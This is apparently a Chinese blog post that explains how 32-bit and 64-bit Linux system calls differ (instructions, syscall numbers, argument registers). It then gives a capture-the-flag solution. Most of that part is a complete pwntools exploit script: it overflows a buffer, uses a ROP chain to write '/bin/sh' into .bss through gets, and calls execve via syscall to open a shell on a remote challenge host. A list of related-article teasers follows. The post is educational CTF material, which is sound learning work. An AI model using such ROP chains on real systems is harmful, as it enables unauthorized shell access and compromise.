64位linux 系统调用,关于32位和64位linux的系统调用

最新推荐文章于 2023-03-08 23:46:02 发布
最新推荐文章于 2023-03-08 23:46:02 发布
阅读量485 收藏 2
点赞数
文章标签: 64位linux 系统调用

32位和64位的syscall原理都是一样

只有传参和调用存在差异,以下一起说,做个对比

32位系统调用使用 " int 80h "

64位系统调用使用 " syscall " (汇编代码就是syscall 直接ROPgadget--only查找即可)

32的系统调用号与64位的不大一样 使用的时候最好百度一下

比如

32位     #define __NR_execve 11

64位     #define __NR_execve 59

32位的系统调用号放在eax 传参依次是 EBX、ECX、EDX、ESI、EDI、EBP

64位的系统调用号放在rax 传参依次是 RDI、RSI、RDX、R10、R8、R9  (和64位函数传参一样)

一个64位的题目

题目说的很清楚了 构造ROP chain

没有/bin/sh字眼 只能自己gets  到bss区域 然后调用execve

(想过使用shellcode 但是没找到合适的可执行地址)

from pwn import *

#io=process('./chall')

elf=ELF('./chall')

io=remote('hack.bckdr.in',15102)#context(os='linux', arch='amd64', log_level='debug')#context.terminal = ['gnome-terminal', '-x', 'sh', '-c']#gdb.attach(proc.pidof(io)[0])

bss_addr=elf.bss()print 'bss_addr:'+hex(bss_addr)

gets_addr=0x04086A0main_addr=0x4010A0start_addr=0x400F4Epop_rax=0x46b9f8pop_rdi=0x4016c3pop_rsi=0x4017d7pop_rdx=0x4377d5syscal=0x400488payload='A'*0x28payload+=p64(pop_rdi)+p64(bss_addr)

payload+=p64(gets_addr)

payload+=p64(main_addr)

io.sendlineafter('Create a ROP chain for me\n',payload)

sleep(1)

io.send('/bin/sh\n')

sleep(1)

payload='A'*0x28payload+=p64(pop_rax)+p64(59)

payload+=p64(pop_rdi)+p64(bss_addr)

payload+=p64(pop_rsi)+p64(0)

payload+=p64(pop_rdx)+p64(0)

payload+=p64(syscal)

sleep(2)

io.sendlineafter('Create a ROP chain for me\n',payload)#io.send('/bin/sh\n')

io.interactive()#rax rdi rsi rdx#59 sh 0 0

别摸气球
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
32位编译器如何传递64位参数
qq_39543131的博客
01-29 568
32位编译器如何传递64位参数 之前我们了解到,无论我们传递参数是1字节2字节,最后编译器都会默认4字节的给我们传送,当我们用到的是8字节的那么是怎么返回的呢? __int64 占用8字节空间 C语言: 我们下断点调试一下看看汇编代码: 在Function函数中我们看到,返回x值时,他会把8字节的值拆分成4字节和4字节,分别放入了eax和edx中。。。 我们看看eax的值: edx: 而...
Linux:32/64位程序(应用程序、共享库、内核模块)
Linuxest
10-16 4807
本文以Ubuntu系统为例,介绍如何编译和使用32/64位的应用程序、共享库和内核模块。
Linux:使用rpcgen实现64位程序调用32位库函数
Linuxest
10-22 2238
本文介绍使用rpcgent实现64位程序调用32位库函数的方法,并给出样例代码。
Linux64位系统调用号——奇偶排列表格方便查找
hollk’s blog
07-10 841
前言 博主精心准备的表格,基数调用号与偶数调用号分开排列,方便查找。 整理不易,如果能够帮到你,记得点赞收藏加关注哦!!!Thanks♪(・ω・)ノ Linux 64位系统 系统调用 调用系统调用 调用号 read 0 write 1 open 2 close 3 stat 4 fstat 5 lstat 6 poll 7 lseek 8 mmap 9 mprotect 10 munmap 11 brk 12 rt_sigaction 13 rt_sigp.
AT&T汇编之32位与64位系统调用
FreeeLinux's blog
12-17 2440
查看系统调用号 locate unistd_64 less /usr/include/x86_64-linux-gnu/asm/unistd_64.h Linux 32位系统调用和64位系统调用的区别 系统调用号不同。如sys_write在32位下是4,在64位下是1。 调用方法不同。我们在32位下用int 80H中断进行系统调用,而64位下需要用syscall指令进行系统调用。 传参方式不...
三种方法实现Linux系统调用
09-15
以下是关于三种方法实现Linux系统调用的详细说明: 1. **通过glibc提供的库函数**: glibc(GNU C Library)是Linux环境下广泛使用的标准C库,它为程序员提供了大量的API,包括对系统调用的封装。glibc中的库函数...
Linux系统调用.pdf
01-27
Linux系统调用概述 Linux系统调用是用户空间访问内核的唯一手段,它们是内核唯一的合法入口。通知内核的机制是通过软中断的机制实现的:通过引发一个异常来促使系统切换到内核态去执行异常处理程序。此时的异常处理...
linux系统调用实验一条龙.rar
12-31
题目:在Linux内核中增加一个系统调用,并编写对应的Linux应用程序。利用该系统调用能够遍历系统当前所有进程的任务描述符,并按进程父子关系将这些描述符所对应的进程id(PID)组织成树形结构显示。 说明:代码有...
Linux系统调用.ppt
11-21
Linux系统调用是指用户程序和操作系统之间的接口,用户程序可以通过系统调用来请求操作系统提供的服务。系统调用是用户程序和硬件设备之间的桥梁,使得用户程序可以请求操作系统提供的服务,而不需要关心具体的硬件...
操作系统-linux系统调用.doc
11-15
从操作系统原理的角度看,系统调用过程可以分为三个阶段:系统调用号的分配、系统调用过程和系统调用表的维护。 首先,在Linux中,每个系统调用都赋予一个独一无二的系统调用号。这个系统调用号用于标识不同的系统...
Linux32位系统调用号——奇偶排列表格方便查找
hollk’s blog
07-10 987
Linux32位系统 系统调用 调用系统调用 调用号 exit 1 fork 2 read 3 write 4 open 5 close 6 waitpid 7 creat 8 link 9 unlink 10 execve 11 chdir 12 time 13 mknod 14 chmod 15 lchown 16 break 17 oldstat 18 lseek 19 getpid 20 mount 21 umount 22 setui
操作系统实战45讲之32位汇编语言系统调用浅析
最新发布
qq_42108074的博客
03-08 174
操作系统实战45讲之汇编语言系统调用
系统调用
雪的期许
08-21 5869
linux系统调用号,32位 exit 1 fork 2 read 3 write 4 open 5 close 6 waitpid 7 creat 8 link 9 unlink 10 execve 11 chdir 12 time 13 mknod 14 chmod 15 lchown 16 break 17 oldstat 18 lseek 19 getpid 20 mount 21 umount 22 setuid 23 getuid 24 stime 25 ptrace 26 alarm 27 o
linux添加系统调用【简单易懂】【含32位系统】【含64位系统
Edogawa_sama的博客
02-28 3157
linux添加系统调用【简单易懂】【含32位系统】【含64位系统
Linux x64下hook系统调用execve的正确方法
weixin_33881753的博客
01-16 1038
为什么80%的码农都做不了架构师?>>> ...
linux下32位汇编调用规则
weixin_34112030的博客
05-25 255
传递给系统调用的参数必须安装参数顺序一次放到寄存器中,当系统调用完成后,返回值放在eax中: 当系统调用参数<=5个时: eax中存放系统调用的功能号,传递给系统调用的参数顺序依次放到寄存器:ebx,ecx,edx,esi,edi中 当系统调用参数>5个时: eax中存放系统调用的功能号,全部参数应依次放在一块连续的...
第16部分- Linux ARM汇编 ARM64调用标准
badman250的专栏
06-06 789
第16部分- Linux ARM汇编 ARM64调用标准 本章主要是是一些描述性的内容,我们先来看下4个术语。 AArch32– the legacy 32-bit instruction set architecture (ISA) defined by ARM, including Thumb mode execution. AArch64– the new 64-bit instruction set architecture (ISA) defined by ARM. ARMv7– t...
linux64参数传递方式
xuriwuyun的专栏
10-12 1465
调用有八个参数的函数: eight_p.c    1 #include    2     3 void eight_f(char b,short c, int d, long e,int f,int g,int h,int k)    4 {}    5     6 int main(int argc,char*argv[])    7 {    8  eight_f(1,2
linux x64 寄存器 传参,Linux X86架构参数传递规则
weixin_33268464的博客
05-13 1528
背景突然好奇x86架构下函数参数怎么传递的,之前只是听别人说过通过寄存器,但是怎么传,什么顺序都没有仔细研究过,也没有实际测试过,因此就想着用实践来检验一下咯。传参顺序在32位和64位机器上,寄存器名称不同,64位机器为rxx,32位机器为exx。传参顺序如下,64位系统有16个寄存器,32位系统只有8个。e开头的寄存器命名依然可以直接运用于相应寄存器的低32位。而剩下的寄存器名则是从r8 - r...
Linux内核中增加一个系统调用.pdf
07-13
"Linux内核中增加一个系统调用" 在Linux操作系统中,系统调用是用户空间程序与内核交互的桥梁,它们提供了安全、高效的服务接口。本资源详细介绍了如何在Linux内核中添加一个新的系统调用,以及编写相应的应用程序...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值